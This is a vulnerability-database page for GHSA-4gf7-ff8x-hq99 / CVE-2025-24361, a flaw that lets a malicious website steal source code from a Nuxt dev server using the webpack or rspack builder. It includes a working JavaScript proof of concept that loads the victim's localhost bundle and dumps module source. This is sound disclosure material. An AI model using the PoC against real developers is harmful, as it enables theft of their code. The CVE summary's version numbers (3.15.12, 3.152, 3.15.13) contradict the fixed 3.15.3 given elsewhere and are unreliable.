github - ghsa-4gf7-ff8x-hq99

GHSA-4GF7-FF8X-HQ99

Vulnerability from github – Published: 2025-01-27 11:31 – Updated: 2025-01-30 03:05

Summary

Opening a malicious website while running a Nuxt dev server could allow read-only access to code

Details

Summary

Source code may be stolen during dev when using webpack / rspack builder and you open a malicious web site.

Details

Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:3000/_nuxt/app.js"> in their site and run the script. By using Function::toString against the values in window.webpackChunknuxt_app, the attacker can get the source code.

PoC

Create a nuxt project with webpack / rspack builder.
Run npm run dev
Open http://localhost:3000
Run the script below in a web site that has a different origin.
You can see the source code output in the document and the devtools console.

const script = document.createElement('script')
script.src = 'http://localhost:3000/_nuxt/app.js'
script.addEventListener('load', () => {
  for (const page in window.webpackChunknuxt_app) {
    const moduleList = window.webpackChunknuxt_app[page][1]
    console.log(moduleList)

    for (const key in moduleList) {
      const p = document.createElement('p')
      const title = document.createElement('strong')
      title.textContent = key
      const code = document.createElement('code')
      code.textContent = moduleList[key].toString()
      p.append(title, ':', document.createElement('br'), code)
      document.body.appendChild(p)
    }
  }
})
document.head.appendChild(script)

It contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in the sourcesContent field).

Impact

Users using webpack / rspack builder may get the source code stolen by malicious websites.

Severity ?

5.3 (Medium)


                  
                    CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@nuxt/webpack-builder"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.15.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@nuxt/rspack-builder"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.12.2"
            },
            {
              "fixed": "3.15.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-24361"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-749"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-01-27T11:31:41Z",
    "nvd_published_at": "2025-01-25T01:15:24Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nSource code may be stolen during dev when using webpack / rspack builder and you open a malicious web site.\n\n### Details\nBecause the request for classic script by a script tag is not subject to same origin policy, an attacker can inject `\u003cscript src=\"http://localhost:3000/_nuxt/app.js\"\u003e` in their site and run the script.\nBy using `Function::toString` against the values in `window.webpackChunknuxt_app`, the attacker can get the source code.\n\n### PoC\n1. Create a nuxt project with webpack / rspack builder.\n1. Run `npm run dev`\n1. Open `http://localhost:3000`\n1. Run the script below in a web site that has a different origin.\n1. You can see the source code output in the document and the devtools console.\n\n```js\nconst script = document.createElement(\u0027script\u0027)\nscript.src = \u0027http://localhost:3000/_nuxt/app.js\u0027\nscript.addEventListener(\u0027load\u0027, () =\u003e {\n  for (const page in window.webpackChunknuxt_app) {\n    const moduleList = window.webpackChunknuxt_app[page][1]\n    console.log(moduleList)\n\n    for (const key in moduleList) {\n      const p = document.createElement(\u0027p\u0027)\n      const title = document.createElement(\u0027strong\u0027)\n      title.textContent = key\n      const code = document.createElement(\u0027code\u0027)\n      code.textContent = moduleList[key].toString()\n      p.append(title, \u0027:\u0027, document.createElement(\u0027br\u0027), code)\n      document.body.appendChild(p)\n    }\n  }\n})\ndocument.head.appendChild(script)\n```\n\n![image](https://github.com/user-attachments/assets/201e39b7-da5c-4359-867f-96c9adfd3c85)\nIt contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in the `sourcesContent` field).\n\n### Impact\nUsers using webpack / rspack builder may get the source code stolen by malicious websites.\n",
  "id": "GHSA-4gf7-ff8x-hq99",
  "modified": "2025-01-30T03:05:05Z",
  "published": "2025-01-27T11:31:41Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24361"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nuxt/nuxt/commit/7eeb910bf4accb1e0193b9178c746f06ad3dd88f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nuxt/nuxt"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Opening a malicious website while running a Nuxt dev server could allow read-only access to code"
}

CVE-2025-24361 (GCVE-0-2025-24361)

Vulnerability from cvelistv5 – Published: 2025-01-25 00:53 – Updated: 2025-02-12 20:41

Summary

Nuxt is an open-source web development framework for Vue.js. Source code may be stolen during dev when using version 3.0.0 through 3.15.12 of the webpack builder or version 3.12.2 through 3.152 of the rspack builder and a victim opens a malicious web site. Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject a malicious script in their site and run the script. By using `Function::toString` against the values in `window.webpackChunknuxt_app`, the attacker can get the source code. Version 3.15.13 of Nuxt patches this issue.

Severity ?

5.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

CWE

CWE-749 - Exposed Dangerous Method or Function

Assigner

GitHub_M

References

URL

Tags

	https://github.com/nuxt/nuxt/security/advisories/…	x_refsource_CONFIRM
	https://github.com/nuxt/nuxt/commit/7eeb910bf4acc…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	nuxt	nuxt	Affected: >= 3.0.0, < 3.15.3 Affected: >= 3.12.2, < 3.15.3

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-24361",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-01-27T14:13:25.340238Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-02-12T20:41:32.191Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "nuxt",
          "vendor": "nuxt",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 3.0.0, \u003c 3.15.3"
            },
            {
              "status": "affected",
              "version": "\u003e= 3.12.2, \u003c 3.15.3"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Nuxt is an open-source web development framework for Vue.js. Source code may be stolen during dev when using version 3.0.0 through 3.15.12 of the webpack builder or version 3.12.2 through 3.152 of the rspack builder and a victim opens a malicious web site. Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject a malicious script in their site and run the script. By using `Function::toString` against the values in `window.webpackChunknuxt_app`, the attacker can get the source code. Version 3.15.13 of Nuxt patches this issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-749",
              "description": "CWE-749: Exposed Dangerous Method or Function",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-01-25T00:53:23.400Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99"
        },
        {
          "name": "https://github.com/nuxt/nuxt/commit/7eeb910bf4accb1e0193b9178c746f06ad3dd88f",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/nuxt/nuxt/commit/7eeb910bf4accb1e0193b9178c746f06ad3dd88f"
        }
      ],
      "source": {
        "advisory": "GHSA-4gf7-ff8x-hq99",
        "discovery": "UNKNOWN"
      },
      "title": "Opening a malicious website while running a Nuxt dev server could allow read-only access to code"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-24361",
    "datePublished": "2025-01-25T00:53:23.400Z",
    "dateReserved": "2025-01-20T15:18:26.989Z",
    "dateUpdated": "2025-02-12T20:41:32.191Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

GHSA-4GF7-FF8X-HQ99

Summary

Details

PoC

Impact

CVE-2025-24361 (GCVE-0-2025-24361)

Tags

Sightings

Nomenclature